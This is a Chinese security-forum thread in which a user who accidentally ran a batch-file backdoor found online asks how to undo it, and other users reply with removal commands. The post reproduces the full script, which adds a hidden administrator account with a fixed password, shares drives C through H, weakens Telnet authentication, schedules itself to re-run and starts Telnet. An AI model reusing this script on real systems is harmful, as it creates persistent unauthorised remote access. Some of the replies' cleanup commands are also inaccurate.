瑞星卡卡安全论坛技术交流区入侵防御(HIPS) 自已运行小后门,中招了,求助~~~

1   1  /  1  页   跳转

自已运行小后门,中招了,求助~~~

自已运行小后门,中招了,求助~~~

无意中在网上看到个批处理的小后门,觉得挺有意思的``就把它存了起来```
今天不小心运行了~~
所有磁盘都被共享出来了,而且无法关闭,请大手支招
……
感谢~

对了,代码如下

@echo off
  @attrib +s + r abc.bat
  @net user abc 12345678 /add
  @net localgroup administrators abc /add
  @net share c$=c:
  @net share d$=d:
  @net share e$=e:
  @net share f$=f:
  @net share g$=g:
  @net share h$=h:
  @tlntadmn config sec = -ntlm
  @net stop schedule
  @net start Schedule
  @echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\abc.bat
  @echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\abc.bat
  @at 11:05 c:\WINNT\SYSTEM32\abc.bat
  @at 23:05 c:\WINNT\SYSTEM32\abc.bat
  @net stop telnet
  @net start telnet
  @exit

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; CIBA)
分享到:
gototop
 

回复:自已运行小后门,中招了,求助~~~

该用户帖子内容已被屏蔽
gototop
 

回复:自已运行小后门,中招了,求助~~~

该用户帖子内容已被屏蔽
gototop
 

回复 3F asdkfmasdfiaskdi 的帖子

该用户帖子内容已被屏蔽
gototop
 

回复:自已运行小后门,中招了,求助~~~

用360或者瑞星上网助手,扫描一下就会报出这些弱点吧,然后跟着提示关掉就哦了。我觉得,没具体遇到过这个问题,遇到过类似的。
gototop
 

回复:自已运行小后门,中招了,求助~~~

直接cmd--

net share IPC$ /del
依次类推就可以了,要是不行的话再来论坛求救吧
gototop
 

回复:自已运行小后门,中招了,求助~~~

刚才又看到了一句,
@net stop telnet
  @net start telnet
这两句是开启telnet的服务,不过你设置了复杂的密码的话也是没什么大事的,XP默认是禁用的,你最好也是禁用了此服务。
gototop
 

回复:自已运行小后门,中招了,求助~~~

attrib -s - r abc.bat
net user abc delete
net share IPC$ /del
net stop schedule
net start telnet
del abc.bat
应该就可以了
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT